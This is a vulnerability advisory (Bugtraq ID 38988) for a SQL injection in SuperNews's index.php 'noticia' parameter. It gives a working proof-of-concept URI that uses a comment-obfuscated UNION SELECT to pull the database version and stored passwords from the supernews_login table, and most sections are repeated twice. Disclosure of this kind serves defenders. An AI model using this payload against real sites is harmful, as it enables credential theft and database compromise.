SuperNews 'index.php' SQL Injection Vulnerability
BID:38988
Info
SuperNews 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 38988 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2010 12:00AM |
| Updated: | Mar 31 2010 05:22PM |
| Credit: | d4rk-h4ck3r |
| Vulnerable: |
SuperNews SuperNews 0 |
| Not Vulnerable: | |
Discussion
SuperNews 'noticia' Parameter SQL Injection Vulnerability
SuperNews is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperNews is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
SuperNews 'noticia' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following URI is available:
http://www.example.com/[path]/index.php?noticia=null/**/union/**/all/**/select/**/1,2,3,4,@@version,pass,7/**/from/**/supernews_login
The following exploit is available:
Attackers can use a browser to exploit this issue.
The following URI is available:
http://www.example.com/[path]/index.php?noticia=null/**/union/**/all/**/select/**/1,2,3,4,@@version,pass,7/**/from/**/supernews_login
The following exploit is available:
Solution / Fix
SuperNews 'noticia' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SuperNews 'noticia' Parameter SQL Injection Vulnerability
References:
References:
- SuperNews (index.php) SQL Injection Vulnerability (d4rk-h4ck3r)